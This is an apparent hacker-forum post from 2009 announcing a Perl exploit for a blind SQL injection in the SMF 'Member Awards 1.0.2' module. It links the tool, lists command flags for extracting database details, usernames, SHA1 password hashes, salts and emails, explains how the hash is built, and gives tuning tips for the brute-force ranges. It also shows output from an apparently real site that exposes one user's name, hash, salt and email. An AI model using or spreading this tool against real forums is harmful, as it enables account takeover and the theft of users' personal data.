SMF ] MemberAwards 1.0.2 exploit
eLwaux(c)uasc && antichat 2009
thx: Grey && mailbrush

вчора mailbrush найшов Blind SQLinj в модулі для SMF “Member Awards 1.02″.
для автоматизації, і для зручності, я написав екплойт, для видирання таких даних як:
- version(), user(), database()
- логінпарольхешмило любого юзераадміна

UAsc.org.UA/files/SMF-Awart-exploit.zip

юзаем так:
expl.pl http://site.com/smf/index.php ID_MEMBER TABLE_PREF {params}
params:
-v = get version()
-u = get user()
-d = get database()
-an = get User Name (логін)
-ap = get User Password (sha1 хеш)
-as = get User Salt (сальт)
-am = get User Mail (емейл)

хеш формується так:
sha1(strtolower(логін).пароль)

результат роботи скрипту:

http://scrubs.net.ru/cms/forum/index.php
] Host: scrubs.net.ru
BAD answer = ‘╬°шсър!’ <– Ошибка
] version() = 5
] user() = us5729a@localhost
] database() = db
] id=1 NAME = zhbanito
] id=1 PASS = 4edd40635ac6fd263084d5ccc6fdc624fef3c932
] id=1 SALT = fe81
] id=1 MAIL = shpioner@mail.ru

якшо не получилося витягнути потрібні дані, то можливі причини:

– інший префік таблиці
- символ із паролюлогінуetc не попав в наш)
для цого відкриваємо скрипт і:
$SHOW_ALL = 1; – показывать результат брута
$SHOW_COUNT_REQ = 1; – показать количество запросов
..
все ф-ции в таком формате:
&getAdminName(41,122) , &getAdminPass(41,122), &getUser1(97,122), ..etc
первый параметр – начало перебора, второй – конец.
т.е. для AdminName будет перебор от chr(41) до chr(122).
если скрипт не сможет роспознать имяпарольхешetc значит нужно изменить ети числа на
0..255, т.е. чтоб получилось так:
&getAdminName(0,255) , &getAdminPass(0,255), &getUser1(0,255), ..etc